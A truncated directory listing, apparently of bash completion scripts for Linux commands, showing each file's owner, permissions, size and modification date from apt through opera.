root
0644
appdata-validate
0.772 KB
November 16 2021 5:58:12
root
0644
apropos
2.939 KB
November 16 2021 5:58:12
root
0644
apt
7.337 KB
October 22 2024 9:09:58
root
0644
apt-add-repository
2.194 KB
October 24 2023 8:13:11
root
0644
apt-build
1.445 KB
November 16 2021 5:58:12
root
0644
apt-cache
2.134 KB
November 16 2021 5:58:12
root
0644
apt-get
3.822 KB
November 16 2021 5:58:12
root
0644
aptitude
4.119 KB
November 16 2021 5:58:12
root
0644
aptitude-curses
4.119 KB
November 16 2021 5:58:12
root
0644
arch
1.19 KB
November 16 2021 5:58:12
root
0644
arm-koji
6.205 KB
November 16 2021 5:58:12
root
0644
arp
1.558 KB
November 16 2021 5:58:12
root
0644
arping
0.589 KB
November 16 2021 5:58:12
root
0644
arpspoof
0.551 KB
November 16 2021 5:58:12
root
0644
asciidoc
1.169 KB
November 16 2021 5:58:12
root
0644
asciidoc.py
1.169 KB
November 16 2021 5:58:12
root
0644
aspell
3.292 KB
November 16 2021 5:58:12
root
0644
autoconf
0.943 KB
November 16 2021 5:58:12
root
0644
autoheader
0.996 KB
November 16 2021 5:58:12
root
0644
automake
0.851 KB
November 16 2021 5:58:12
root
0644
automake-1.10
0.851 KB
November 16 2021 5:58:12
root
0644
automake-1.11
0.851 KB
November 16 2021 5:58:12
root
0644
automake-1.12
0.851 KB
November 16 2021 5:58:12
root
0644
automake-1.13
0.851 KB
November 16 2021 5:58:12
root
0644
automake-1.14
0.851 KB
November 16 2021 5:58:12
root
0644
automake-1.15
0.851 KB
November 16 2021 5:58:12
root
0644
automake-1.16
0.851 KB
November 16 2021 5:58:12
root
0644
autoreconf
0.996 KB
November 16 2021 5:58:12
root
0644
autorpm
0.342 KB
November 16 2021 5:58:12
root
0644
autoscan
0.732 KB
November 16 2021 5:58:12
root
0644
autossh
16.108 KB
November 16 2021 5:58:12
root
0644
autoupdate
0.732 KB
November 16 2021 5:58:12
root
0644
avctrl
0.454 KB
November 16 2021 5:58:12
root
0644
badblocks
0.581 KB
November 16 2021 5:58:12
root
0644
bind
0.807 KB
November 16 2021 5:58:12
root
0644
bk
0.419 KB
November 16 2021 5:58:12
root
0644
blkdiscard
0.67 KB
April 09 2024 11:32:56
root
0644
blkid
2.101 KB
April 09 2024 11:32:56
root
0644
blkzone
0.99 KB
April 09 2024 11:32:56
root
0644
blockdev
0.742 KB
April 09 2024 11:32:56
root
0644
bmake
6.039 KB
November 16 2021 5:58:12
root
0644
bootctl
3.12 KB
March 11 2022 8:48:49
root
0644
brctl
1.02 KB
November 16 2021 5:58:12
root
0644
bsdtar
18.226 KB
November 16 2021 5:58:12
root
0644
btdownloadcurses.py
1.039 KB
November 16 2021 5:58:12
root
0644
btdownloadgui.py
1.039 KB
November 16 2021 5:58:12
root
0644
btdownloadheadless.py
1.039 KB
November 16 2021 5:58:12
root
0644
busctl
7.188 KB
March 11 2022 8:48:49
root
0644
bzip2
1.043 KB
November 16 2021 5:58:12
root
0644
c++
2.612 KB
November 16 2021 5:58:12
root
0644
cancel
0.542 KB
November 16 2021 5:58:12
root
0644
cardctl
0.369 KB
November 16 2021 5:58:12
root
0644
carton
1.832 KB
November 16 2021 5:58:12
root
0644
cc
2.612 KB
November 16 2021 5:58:12
root
0644
ccache
1.004 KB
November 16 2021 5:58:12
root
0644
ccze
1.19 KB
November 16 2021 5:58:12
root
0644
cdrecord
3.498 KB
November 16 2021 5:58:12
root
0644
cfagent
0.411 KB
November 16 2021 5:58:12
root
0644
cfdisk
0.594 KB
April 09 2024 11:32:56
root
0644
cfrun
1.241 KB
November 16 2021 5:58:12
root
0644
chage
0.653 KB
November 16 2021 5:58:12
root
0644
change_pw
0.519 KB
November 16 2021 5:58:12
root
0644
chcpu
1.486 KB
April 09 2024 11:32:56
root
0644
check_db
0.365 KB
November 16 2021 5:58:12
root
0644
check_perms
0.312 KB
November 16 2021 5:58:12
root
0644
checksec
0.729 KB
November 16 2021 5:58:12
root
0644
chgrp
0.918 KB
November 16 2021 5:58:12
root
0644
chkconfig
0.882 KB
November 16 2021 5:58:12
root
0644
chmem
0.489 KB
April 09 2024 11:32:56
root
0644
chmod
0.884 KB
November 16 2021 5:58:12
root
0644
chown
1.077 KB
November 16 2021 5:58:12
root
0644
chpasswd
0.68 KB
November 16 2021 5:58:12
root
0644
chrome
1.38 KB
November 16 2021 5:58:12
root
0644
chromium
1.38 KB
November 16 2021 5:58:12
root
0644
chromium-browser
1.38 KB
November 16 2021 5:58:12
root
0644
chronyc
1.534 KB
November 16 2021 5:58:12
root
0644
chrpath
0.523 KB
November 16 2021 5:58:12
root
0644
chrt
0.898 KB
April 09 2024 11:32:56
root
0644
ci
0.837 KB
November 16 2021 5:58:12
root
0644
ciptool
9.383 KB
November 16 2021 5:58:12
root
0644
civclient
1.039 KB
November 16 2021 5:58:12
root
0644
civserver
0.476 KB
November 16 2021 5:58:12
root
0644
cksfv
0.508 KB
November 16 2021 5:58:12
root
0644
cleanarch
0.344 KB
November 16 2021 5:58:12
root
0644
clisp
0.652 KB
November 16 2021 5:58:12
root
0644
clone_member
0.529 KB
November 16 2021 5:58:12
root
0644
clzip
1.116 KB
November 16 2021 5:58:12
root
0644
co
0.837 KB
November 16 2021 5:58:12
root
0644
col
0.449 KB
April 09 2024 11:32:56
root
0644
colcrt
0.473 KB
April 09 2024 11:32:56
root
0644
colormake
6.039 KB
November 16 2021 5:58:12
root
0644
colrm
0.497 KB
April 09 2024 11:32:56
root
0644
column
1.415 KB
April 09 2024 11:32:56
root
0644
compare
8.704 KB
November 16 2021 5:58:12
root
0644
compgen
1.421 KB
November 16 2021 5:58:12
root
0644
complete
1.421 KB
November 16 2021 5:58:12
root
0644
composite
8.704 KB
November 16 2021 5:58:12
root
0644
config_list
0.572 KB
November 16 2021 5:58:12
root
0644
configure
1.176 KB
November 16 2021 5:58:12
root
0644
conjure
8.704 KB
November 16 2021 5:58:12
root
0644
convert
8.704 KB
November 16 2021 5:58:12
root
0644
cowsay
0.53 KB
November 16 2021 5:58:12
root
0644
cowthink
0.53 KB
November 16 2021 5:58:12
root
0644
cpan2dist
1.189 KB
November 16 2021 5:58:12
root
0644
cpio
2.831 KB
November 16 2021 5:58:12
root
0644
cppcheck
2.57 KB
November 16 2021 5:58:12
root
0644
createdb
4.27 KB
November 16 2021 5:58:12
root
0644
createuser
4.27 KB
November 16 2021 5:58:12
root
0644
crontab
1.163 KB
November 16 2021 5:58:12
root
0644
cryptsetup
2.995 KB
November 16 2021 5:58:12
root
0644
ctrlaltdel
0.327 KB
April 09 2024 11:32:56
root
0644
curl
3.231 KB
November 16 2021 5:58:12
root
0644
cvs
11.749 KB
November 16 2021 5:58:12
root
0644
cvsps
1.449 KB
November 16 2021 5:58:12
root
0644
dcop
0.374 KB
November 16 2021 5:58:12
root
0644
dd
1.246 KB
November 16 2021 5:58:12
root
0644
debconf
0.287 KB
February 20 2022 10:42:49
root
0644
debconf-show
0.287 KB
February 20 2022 10:42:49
root
0644
declare
1.235 KB
November 16 2021 5:58:12
root
0644
deja-dup
0.672 KB
November 16 2021 5:58:12
root
0644
delpart
0.55 KB
April 09 2024 11:32:56
root
0644
desktop-file-validate
0.463 KB
November 16 2021 5:58:12
root
0644
devlink
24.52 KB
March 24 2022 7:56:47
root
0644
dfutool
9.383 KB
November 16 2021 5:58:12
root
0644
dhclient
0.68 KB
November 16 2021 5:58:12
root
0644
dict
1.761 KB
November 16 2021 5:58:12
root
0644
display
8.704 KB
November 16 2021 5:58:12
root
0644
dmesg
1.201 KB
April 09 2024 11:32:56
root
0644
dmypy
1.053 KB
November 16 2021 5:58:12
root
0644
dnssec-keygen
1.117 KB
November 16 2021 5:58:12
root
0644
dnsspoof
0.488 KB
November 16 2021 5:58:12
root
0644
dot
1.26 KB
November 16 2021 5:58:12
root
0644
dpkg
4.321 KB
November 16 2021 5:58:12
root
0644
dpkg-deb
4.321 KB
November 16 2021 5:58:12
root
0644
dpkg-query
4.321 KB
November 16 2021 5:58:12
root
0644
dpkg-reconfigure
4.321 KB
November 16 2021 5:58:12
root
0644
dpkg-source
3.207 KB
November 16 2021 5:58:12
root
0644
dropdb
4.27 KB
November 16 2021 5:58:12
root
0644
dropuser
4.27 KB
November 16 2021 5:58:12
root
0644
dselect
0.601 KB
November 16 2021 5:58:12
root
0644
dsniff
0.506 KB
November 16 2021 5:58:12
root
0644
dumpdb
0.362 KB
November 16 2021 5:58:12
root
0644
dumpe2fs
0.506 KB
November 16 2021 5:58:12
root
0644
e2freefrag
0.449 KB
November 16 2021 5:58:12
root
0644
e2label
0.285 KB
November 16 2021 5:58:12
root
0644
ebtables
3.605 KB
November 16 2021 5:58:12
root
0644
ecryptfs-migrate-home
0.487 KB
November 16 2021 5:58:12
root
0644
edquota
3.622 KB
November 16 2021 5:58:12
root
0644
eject
1.219 KB
April 09 2024 11:32:56
root
0644
eog
0.63 KB
November 16 2021 5:58:12
root
0644
ether-wake
0.526 KB
November 16 2021 5:58:12
root
0644
etherwake
0.526 KB
November 16 2021 5:58:12
root
0644
evince
0.953 KB
November 16 2021 5:58:12
root
0644
explodepkg
0.148 KB
November 16 2021 5:58:12
root
0644
export
1.483 KB
November 16 2021 5:58:12
root
0644
f77
2.612 KB
November 16 2021 5:58:12
root
0644
f95
2.612 KB
November 16 2021 5:58:12
root
0644
faillog
0.625 KB
November 16 2021 5:58:12
root
0644
fallocate
0.704 KB
April 09 2024 11:32:56
root
0644
fbgs
1.554 KB
November 16 2021 5:58:12
root
0644
fbi
1.793 KB
November 16 2021 5:58:12
root
0644
fdisk
1.87 KB
April 09 2024 11:32:56
root
0644
feh
4.197 KB
November 16 2021 5:58:12
root
0644
file
0.737 KB
November 16 2021 5:58:12
root
0644
file-roller
1.084 KB
November 16 2021 5:58:12
root
0644
filebucket
9.771 KB
November 16 2021 5:58:12
root
0644
filefrag
0.342 KB
November 16 2021 5:58:12
root
0644
filesnarf
0.437 KB
November 16 2021 5:58:12
root
0644
fincore
0.895 KB
April 09 2024 11:32:56
root
0644
find
3.807 KB
November 16 2021 5:58:12
root
0644
find_member
0.528 KB
November 16 2021 5:58:12
root
0644
findfs
0.679 KB
April 09 2024 11:32:56
root
0644
findmnt
3.12 KB
April 09 2024 11:32:56
root
0644
fio
2.314 KB
November 16 2021 5:58:12
root
0644
firefox
1.18 KB
November 16 2021 5:58:12
root
0644
flake8
0.977 KB
November 16 2021 5:58:12
root
0644
flock
0.854 KB
April 09 2024 11:32:56
root
0644
freebsd-update
0.582 KB
November 16 2021 5:58:12
root
0644
freeciv
1.039 KB
November 16 2021 5:58:12
root
0644
freeciv-gtk2
1.039 KB
November 16 2021 5:58:12
root
0644
freeciv-gtk3
1.039 KB
November 16 2021 5:58:12
root
0644
freeciv-sdl
1.039 KB
November 16 2021 5:58:12
root
0644
freeciv-server
0.476 KB
November 16 2021 5:58:12
root
0644
freeciv-xaw
1.039 KB
November 16 2021 5:58:12
root
0644
fsck
0.752 KB
April 09 2024 11:32:56
root
0644
fsck.cramfs
0.686 KB
April 09 2024 11:32:56
root
0644
fsck.minix
0.408 KB
April 09 2024 11:32:56
root
0644
fsfreeze
0.512 KB
April 09 2024 11:32:56
root
0644
fstrim
0.726 KB
April 09 2024 11:32:56
root
0644
function
1.235 KB
November 16 2021 5:58:12
root
0644
fusermount
0.623 KB
November 16 2021 5:58:12
root
0644
g++
2.612 KB
November 16 2021 5:58:12
root
0644
g++-5
2.612 KB
November 16 2021 5:58:12
root
0644
g++-6
2.612 KB
November 16 2021 5:58:12
root
0644
g++-7
2.612 KB
November 16 2021 5:58:12
root
0644
g++-8
2.612 KB
November 16 2021 5:58:12
root
0644
g4
1.369 KB
November 16 2021 5:58:12
root
0644
g77
2.612 KB
November 16 2021 5:58:12
root
0644
g95
2.612 KB
November 16 2021 5:58:12
root
0644
gapplication
1.356 KB
September 21 2022 7:05:56
root
0644
gcc
2.612 KB
November 16 2021 5:58:12
root
0644
gcc-5
2.612 KB
November 16 2021 5:58:12
root
0644
gcc-6
2.612 KB
November 16 2021 5:58:12
root
0644
gcc-7
2.612 KB
November 16 2021 5:58:12
root
0644
gcc-8
2.612 KB
November 16 2021 5:58:12
root
0644
gccgo
2.612 KB
November 16 2021 5:58:12
root
0644
gccgo-5
2.612 KB
November 16 2021 5:58:12
root
0644
gccgo-6
2.612 KB
November 16 2021 5:58:12
root
0644
gccgo-7
2.612 KB
November 16 2021 5:58:12
root
0644
gccgo-8
2.612 KB
November 16 2021 5:58:12
root
0644
gcj
2.612 KB
November 16 2021 5:58:12
root
0644
gcl
0.601 KB
November 16 2021 5:58:12
root
0644
gdb
1.591 KB
November 16 2021 5:58:12
root
0644
gdbus
0.913 KB
September 21 2022 7:05:56
root
0644
genaliases
0.314 KB
November 16 2021 5:58:12
root
0644
gendiff
0.261 KB
November 16 2021 5:58:12
root
0644
genisoimage
0.857 KB
November 16 2021 5:58:12
root
0644
geoiplookup
0.667 KB
November 16 2021 5:58:12
root
0644
geoiplookup6
0.667 KB
November 16 2021 5:58:12
root
0644
getconf
0.776 KB
November 16 2021 5:58:12
root
0644
getent
1.923 KB
November 16 2021 5:58:12
root
0644
getopt
0.796 KB
April 09 2024 11:32:56
root
0644
gfortran
2.612 KB
November 16 2021 5:58:12
root
0644
gfortran-5
2.612 KB
November 16 2021 5:58:12
root
0644
gfortran-6
2.612 KB
November 16 2021 5:58:12
root
0644
gfortran-7
2.612 KB
November 16 2021 5:58:12
root
0644
gfortran-8
2.612 KB
November 16 2021 5:58:12
root
0644
gio
3.74 KB
September 21 2022 7:05:56
root
0644
git
76.899 KB
July 10 2025 3:46:10
root
0644
gitk
76.899 KB
July 10 2025 3:46:10
root
0644
gkrellm
0.923 KB
November 16 2021 5:58:12
root
0644
gkrellm2
0.923 KB
November 16 2021 5:58:12
root
0644
gm
0.832 KB
November 16 2021 5:58:12
root
0644
gmake
6.039 KB
November 16 2021 5:58:12
root
0644
gmplayer
11.203 KB
November 16 2021 5:58:12
root
0644
gnatmake
0.991 KB
November 16 2021 5:58:12
root
0644
gnokii
6.896 KB
November 16 2021 5:58:12
root
0644
gnome-mplayer
0.929 KB
November 16 2021 5:58:12
root
0644
gnome-screenshot
0.791 KB
November 16 2021 5:58:12
root
0644
gnumake
6.039 KB
November 16 2021 5:58:12
root
0644
google-chrome
1.38 KB
November 16 2021 5:58:12
root
0644
google-chrome-stable
1.38 KB
November 16 2021 5:58:12
root
0644
gpasswd
0.588 KB
November 16 2021 5:58:12
root
0644
gpc
2.612 KB
November 16 2021 5:58:12
root
0644
gpg
1.261 KB
November 16 2021 5:58:12
root
0644
gpg2
1.324 KB
November 16 2021 5:58:12
root
0644
gpgv
1.087 KB
November 16 2021 5:58:12
root
0644
gpgv2
1.087 KB
November 16 2021 5:58:12
root
0644
gphoto2
1.375 KB
November 16 2021 5:58:12
root
0644
gprof
1.313 KB
November 16 2021 5:58:12
root
0644
gresource
1.324 KB
September 21 2022 7:05:56
root
0644
groupadd
0.604 KB
November 16 2021 5:58:12
root
0644
groupdel
0.525 KB
November 16 2021 5:58:12
root
0644
groupmems
0.597 KB
November 16 2021 5:58:12
root
0644
groupmod
0.674 KB
November 16 2021 5:58:12
root
0644
growisofs
0.874 KB
November 16 2021 5:58:12
root
0644
grpck
0.486 KB
November 16 2021 5:58:12
root
0644
grub
10.387 KB
December 19 2022 5:21:26
root
0644
grub-bios-setup
10.387 KB
December 19 2022 5:21:26
root
0644
grub-editenv
10.387 KB
December 19 2022 5:21:26
root
0644
grub-install
10.387 KB
December 19 2022 5:21:26
root
0644
grub-mkconfig
10.387 KB
December 19 2022 5:21:26
root
0644
grub-mkfont
10.387 KB
December 19 2022 5:21:26
root
0644
grub-mkimage
10.387 KB
December 19 2022 5:21:26
root
0644
grub-mkpasswd-pbkdf2
10.387 KB
December 19 2022 5:21:26
root
0644
grub-mkrescue
10.387 KB
December 19 2022 5:21:26
root
0644
grub-probe
10.387 KB
December 19 2022 5:21:26
root
0644
grub-reboot
10.387 KB
December 19 2022 5:21:26
root
0644
grub-script-check
10.387 KB
December 19 2022 5:21:26
root
0644
grub-set-default
10.387 KB
December 19 2022 5:21:26
root
0644
gsettings
2.763 KB
September 21 2022 7:05:56
root
0644
gssdp-discover
0.9 KB
November 16 2021 5:58:12
root
0644
gtar
18.226 KB
November 16 2021 5:58:12
root
0644
gzip
1.132 KB
November 16 2021 5:58:12
root
0644
hardlink
0.59 KB
April 09 2024 11:32:56
root
0644
hciattach
9.383 KB
November 16 2021 5:58:12
root
0644
hciconfig
9.383 KB
November 16 2021 5:58:12
root
0644
hcitool
9.383 KB
November 16 2021 5:58:12
root
0644
hd
0.661 KB
November 16 2021 5:58:12
root
0644
hddtemp
0.869 KB
November 16 2021 5:58:12
root
0644
hexdump
0.983 KB
April 09 2024 11:32:56
root
0644
hid2hci
0.34 KB
November 16 2021 5:58:12
root
0644
host
1.971 KB
November 16 2021 5:58:12
root
0644
hostname
0.479 KB
November 16 2021 5:58:12
root
0644
hostnamectl
2.687 KB
March 11 2022 8:48:49
root
0644
hping
0.773 KB
November 16 2021 5:58:12
root
0644
hping2
0.773 KB
November 16 2021 5:58:12
root
0644
hping3
0.773 KB
November 16 2021 5:58:12
root
0644
htop
0.788 KB
November 16 2021 5:58:12
root
0644
htpasswd
0.9 KB
November 16 2021 5:58:12
root
0644
hunspell
1.001 KB
November 16 2021 5:58:12
root
0644
hwclock
0.938 KB
April 09 2024 11:32:56
root
0644
iceweasel
1.18 KB
November 16 2021 5:58:12
root
0644
iconv
0.905 KB
November 16 2021 5:58:12
root
0644
id
0.423 KB
November 16 2021 5:58:12
root
0644
identify
8.704 KB
November 16 2021 5:58:12
root
0644
idn
0.65 KB
November 16 2021 5:58:12
root
0644
ifdown
0.885 KB
November 16 2021 5:58:12
root
0644
ifquery
0.885 KB
November 16 2021 5:58:12
root
0644
ifstat
2.003 KB
November 16 2021 5:58:12
root
0644
ifstatus
0.885 KB
November 16 2021 5:58:12
root
0644
iftop
0.5 KB
November 16 2021 5:58:12
root
0644
ifup
0.885 KB
November 16 2021 5:58:12
root
0644
import
8.704 KB
November 16 2021 5:58:12
root
0644
influx
0.864 KB
November 16 2021 5:58:12
root
0644
info
1.877 KB
November 16 2021 5:58:12
root
0644
inject
0.498 KB
November 16 2021 5:58:12
root
0644
inotifywait
1.243 KB
November 16 2021 5:58:12
root
0644
inotifywatch
1.243 KB
November 16 2021 5:58:12
root
0644
insmod
0.506 KB
November 16 2021 5:58:12
root
0644
insmod.static
0.506 KB
November 16 2021 5:58:12
root
0644
installpkg
0.714 KB
November 16 2021 5:58:12
root
0644
interdiff
0.756 KB
November 16 2021 5:58:12
root
0644
invoke-rc.d
1.193 KB
November 16 2021 5:58:12
root
0644
ionice
1.134 KB
April 09 2024 11:32:56
root
0644
ip
12.635 KB
November 16 2021 5:58:12
root
0644
ipcalc
0.529 KB
November 16 2021 5:58:12
root
0644
ipcmk
0.563 KB
April 09 2024 11:32:56
root
0644
ipcrm
1.39 KB
April 09 2024 11:32:56
root
0644
ipcs
0.502 KB
April 09 2024 11:32:56
root
0644
iperf
2.058 KB
November 16 2021 5:58:12
root
0644
iperf3
2.058 KB
November 16 2021 5:58:12
root
0644
ipmitool
5.529 KB
November 16 2021 5:58:12
root
0644
ipsec
3.055 KB
November 16 2021 5:58:12
root
0644
iptables
1.918 KB
November 16 2021 5:58:12
root
0644
ipv6calc
1.015 KB
November 16 2021 5:58:12
root
0644
iscsiadm
1.87 KB
November 16 2021 5:58:12
root
0644
isort
1.324 KB
November 16 2021 5:58:12
root
0644
isosize
0.517 KB
April 09 2024 11:32:56
root
0644
isql
0.344 KB
November 16 2021 5:58:12
root
0644
iwconfig
2.703 KB
November 16 2021 5:58:12
root
0644
iwlist
0.593 KB
November 16 2021 5:58:12
root
0644
iwpriv
0.708 KB
November 16 2021 5:58:12
root
0644
iwspy
0.467 KB
November 16 2021 5:58:12
root
0644
jar
0.485 KB
November 16 2021 5:58:12
root
0644
jarsigner
1.657 KB
November 16 2021 5:58:12
root
0644
java
8.807 KB
November 16 2021 5:58:12
root
0644
javac
8.807 KB
November 16 2021 5:58:12
root
0644
javadoc
8.807 KB
November 16 2021 5:58:12
root
0644
javaws
0.776 KB
November 16 2021 5:58:12
root
0644
journalctl
6.121 KB
March 11 2022 8:48:49
root
0644
jpegoptim
0.87 KB
November 16 2021 5:58:12
root
0644
jps
0.588 KB
November 16 2021 5:58:12
root
0644
jq
1.221 KB
November 16 2021 5:58:12
root
0644
jshint
0.882 KB
November 16 2021 5:58:12
root
0644
json_xs
0.843 KB
November 16 2021 5:58:12
root
0644
jsonschema
0.627 KB
November 16 2021 5:58:12
root
0644
k3b
1.158 KB
November 16 2021 5:58:12
root
0644
kcov
1.719 KB
November 16 2021 5:58:12
root
0644
kernel-install
1.647 KB
March 11 2022 8:48:49
root
0644
kill
0.563 KB
November 16 2021 5:58:12
root
0644
killall
0.766 KB
November 16 2021 5:58:12
root
0644
kldload
0.462 KB
November 16 2021 5:58:12
root
0644
kldunload
0.363 KB
November 16 2021 5:58:12
root
0644
kmod
3.159 KB
August 17 2021 5:19:53
root
0644
koji
6.205 KB
November 16 2021 5:58:12
root
0644
kplayer
11.203 KB
November 16 2021 5:58:12
root
0644
ktutil
2.933 KB
November 16 2021 5:58:12
root
0644
l2ping
9.383 KB
November 16 2021 5:58:12
root
0644
larch
1.935 KB
November 16 2021 5:58:12
root
0644
last
0.927 KB
April 09 2024 11:32:56
root
0644
lastlog
0.57 KB
November 16 2021 5:58:12
root
0644
lbzip2
1.043 KB
November 16 2021 5:58:12
root
0644
ldapadd
4.355 KB
November 16 2021 5:58:12
root
0644
ldapcompare
4.355 KB
November 16 2021 5:58:12
root
0644
ldapdelete
4.355 KB
November 16 2021 5:58:12
root
0644
ldapmodify
4.355 KB
November 16 2021 5:58:12
root
0644
ldapmodrdn
4.355 KB
November 16 2021 5:58:12
root
0644
ldappasswd
4.355 KB
November 16 2021 5:58:12
root
0644
ldapsearch
4.355 KB
November 16 2021 5:58:12
root
0644
ldapvi
1.339 KB
November 16 2021 5:58:12
root
0644
ldapwhoami
4.355 KB
November 16 2021 5:58:12
root
0644
ldattach
1.438 KB
April 09 2024 11:32:56
root
0644
lftp
0.603 KB
November 16 2021 5:58:12
root
0644
lftpget
0.299 KB
November 16 2021 5:58:12
root
0644
lilo
1.583 KB
November 16 2021 5:58:12
root
0644
links
3.21 KB
November 16 2021 5:58:12
root
0644
links2
3.21 KB
November 16 2021 5:58:12
root
0644
lintian
5.245 KB
November 16 2021 5:58:12
root
0644
lintian-info
5.245 KB
November 16 2021 5:58:12
root
0644
lisp
0.626 KB
November 16 2021 5:58:12
root
0644
list_admins
0.376 KB
November 16 2021 5:58:12
root
0644
list_lists
0.452 KB
November 16 2021 5:58:12
root
0644
list_members
0.834 KB
November 16 2021 5:58:12
root
0644
list_owners
0.401 KB
November 16 2021 5:58:12
root
0644
locale-gen
0.698 KB
November 16 2021 5:58:12
root
0644
localectl
3.247 KB
March 11 2022 8:48:49
root
0644
logger
1.517 KB
April 09 2024 11:32:56
root
0644
loginctl
3.986 KB
March 11 2022 8:48:49
root
0644
look
0.667 KB
April 09 2024 11:32:56
root
0644
losetup
1.697 KB
April 09 2024 11:32:56
root
0644
lpq
0.576 KB
November 16 2021 5:58:12
root
0644
lpr
0.88 KB
November 16 2021 5:58:12
root
0644
lrzip
1.083 KB
November 16 2021 5:58:12
root
0644
lsblk
2.104 KB
April 09 2024 11:32:56
root
0644
lscpu
1.041 KB
April 09 2024 11:32:56
root
0644
lsipc
1.279 KB
April 09 2024 11:32:56
root
0644
lslocks
1.059 KB
April 09 2024 11:32:56
root
0644
lslogins
1.71 KB
April 09 2024 11:32:56
root
0644
lsmem
1.044 KB
April 09 2024 11:32:56
root
0644
lsns
1.163 KB
April 09 2024 11:32:56
root
0644
lsof
1.378 KB
November 16 2021 5:58:12
root
0644
lsscsi
0.58 KB
November 16 2021 5:58:12
root
0644
lsusb
0.413 KB
November 16 2021 5:58:12
root
0644
lua
0.428 KB
November 16 2021 5:58:12
root
0644
luac
0.475 KB
November 16 2021 5:58:12
root
0644
luseradd
1.029 KB
November 16 2021 5:58:12
root
0644
luserdel
0.466 KB
November 16 2021 5:58:12
root
0644
lusermod
1.029 KB
November 16 2021 5:58:12
root
0644
lvchange
19.013 KB
November 16 2021 5:58:12
root
0644
lvcreate
19.013 KB
November 16 2021 5:58:12
root
0644
lvdisplay
19.013 KB
November 16 2021 5:58:12
root
0644
lvextend
19.013 KB
November 16 2021 5:58:12
root
0644
lvm
19.013 KB
November 16 2021 5:58:12
root
0644
lvmdiskscan
19.013 KB
November 16 2021 5:58:12
root
0644
lvreduce
19.013 KB
November 16 2021 5:58:12
root
0644
lvremove
19.013 KB
November 16 2021 5:58:12
root
0644
lvrename
19.013 KB
November 16 2021 5:58:12
root
0644
lvresize
19.013 KB
November 16 2021 5:58:12
root
0644
lvs
19.013 KB
November 16 2021 5:58:12
root
0644
lvscan
19.013 KB
November 16 2021 5:58:12
root
0644
lz4
1.143 KB
November 16 2021 5:58:12
root
0644
lz4c
1.143 KB
November 16 2021 5:58:12
root
0644
lzip
1.116 KB
November 16 2021 5:58:12
root
0644
lzma
0.894 KB
November 16 2021 5:58:12
root
0644
lzop
1.446 KB
November 16 2021 5:58:12
root
0644
macof
0.414 KB
November 16 2021 5:58:12
root
0644
mailmanctl
0.452 KB
November 16 2021 5:58:12
root
0644
mailsnarf
0.437 KB
November 16 2021 5:58:12
root
0644
make
6.039 KB
November 16 2021 5:58:12
root
0644
makepkg
1.021 KB
November 16 2021 5:58:12
root
0644
man
2.939 KB
November 16 2021 5:58:12
root
0644
mc
0.673 KB
November 16 2021 5:58:12
root
0644
mcookie
0.585 KB
April 09 2024 11:32:56
root
0644
mcrypt
1.796 KB
November 16 2021 5:58:12
root
0644
mdadm
4.413 KB
November 16 2021 5:58:12
root
0644
mdecrypt
1.796 KB
November 16 2021 5:58:12
root
0644
mdtool
2.072 KB
November 16 2021 5:58:12
root
0644
medusa
0.656 KB
November 16 2021 5:58:12
root
0644
mencoder
11.203 KB
November 16 2021 5:58:12
root
0644
mesg
0.402 KB
April 09 2024 11:32:56
root
0644
micropython
1.726 KB
November 16 2021 5:58:12
root
0644
mii-diag
0.64 KB
November 16 2021 5:58:12
root
0644
mii-tool
0.832 KB
November 16 2021 5:58:12
root
0644
minicom
1.07 KB
November 16 2021 5:58:12
root
0644
mkfs
0.644 KB
April 09 2024 11:32:56
root
0644
mkfs.bfs
0.661 KB
April 09 2024 11:32:56
root
0644
mkfs.cramfs
0.819 KB
April 09 2024 11:32:56
root
0644
mkfs.minix
0.731 KB
April 09 2024 11:32:56
root
0644
mkinitrd
1.195 KB
November 16 2021 5:58:12
root
0644
mkisofs
0.857 KB
November 16 2021 5:58:12
root
0644
mkswap
0.855 KB
April 09 2024 11:32:56
root
0644
mktemp
0.663 KB
November 16 2021 5:58:12
root
0644
mmsitepass
0.32 KB
November 16 2021 5:58:12
root
0644
modinfo
1.214 KB
November 16 2021 5:58:12
root
0644
modprobe
3.987 KB
November 16 2021 5:58:12
root
0644
mogrify
8.704 KB
November 16 2021 5:58:12
root
0644
monodevelop
0.435 KB
November 16 2021 5:58:12
root
0644
montage
8.704 KB
November 16 2021 5:58:12
root
0644
more
0.734 KB
April 09 2024 11:32:56
root
0644
mount
2.051 KB
April 09 2024 11:32:56
root
0644
mountpoint
0.486 KB
April 09 2024 11:32:56
root
0644
mozilla-firefox
1.18 KB
November 16 2021 5:58:12
root
0644
mplayer
11.203 KB
November 16 2021 5:58:12
root
0644
mplayer2
11.203 KB
November 16 2021 5:58:12
root
0644
mr
2.565 KB
November 16 2021 5:58:12
root
0644
msgsnarf
0.437 KB
November 16 2021 5:58:12
root
0644
msynctool
1.313 KB
November 16 2021 5:58:12
root
0644
mtr
1.902 KB
January 11 2022 8:46:46
root
0644
mtx
1.15 KB
November 16 2021 5:58:12
root
0644
munin-node-configure
0.734 KB
November 16 2021 5:58:12
root
0644
munin-run
0.63 KB
November 16 2021 5:58:12
root
0644
munin-update
0.637 KB
November 16 2021 5:58:12
root
0644
munindoc
0.313 KB
November 16 2021 5:58:12
root
0644
mussh
1.159 KB
November 16 2021 5:58:12
root
0644
mutt
4.349 KB
November 16 2021 5:58:12
root
0644
muttng
4.349 KB
November 16 2021 5:58:12
root
0644
mypy
1.402 KB
November 16 2021 5:58:12
root
0644
mysql
2.601 KB
November 16 2021 5:58:12
root
0644
mysqladmin
1.722 KB
November 16 2021 5:58:12
root
0644
namei
0.488 KB
April 09 2024 11:32:56
root
0644
nc
1.201 KB
November 16 2021 5:58:12
root
0644
ncal
0.904 KB
November 16 2021 5:58:12
root
0644
ncftp
0.612 KB
November 16 2021 5:58:12
root
0644
nethogs
0.543 KB
November 16 2021 5:58:12
root
0644
netplan
2.717 KB
May 18 2023 1:11:16
root
0644
networkctl
2.47 KB
March 11 2022 8:48:49
root
0644
newlist
0.572 KB
November 16 2021 5:58:12
root
0644
newusers
0.643 KB
November 16 2021 5:58:12
root
0644
ngrep
0.829 KB
November 16 2021 5:58:12
root
0644
nmap
1.576 KB
November 16 2021 5:58:12
root
0644
nproc
0.487 KB
November 16 2021 5:58:12
root
0644
nsenter
1.155 KB
April 09 2024 11:32:56
root
0644
nslookup
1.971 KB
November 16 2021 5:58:12
root
0644
nsupdate
0.86 KB
November 16 2021 5:58:12
root
0644
ntpdate
0.694 KB
November 16 2021 5:58:12
root
0644
oggdec
0.852 KB
November 16 2021 5:58:12
root
0644
op
1.474 KB
November 16 2021 5:58:12
root
0644
openssl
4.885 KB
November 16 2021 5:58:12
root
0644
opera
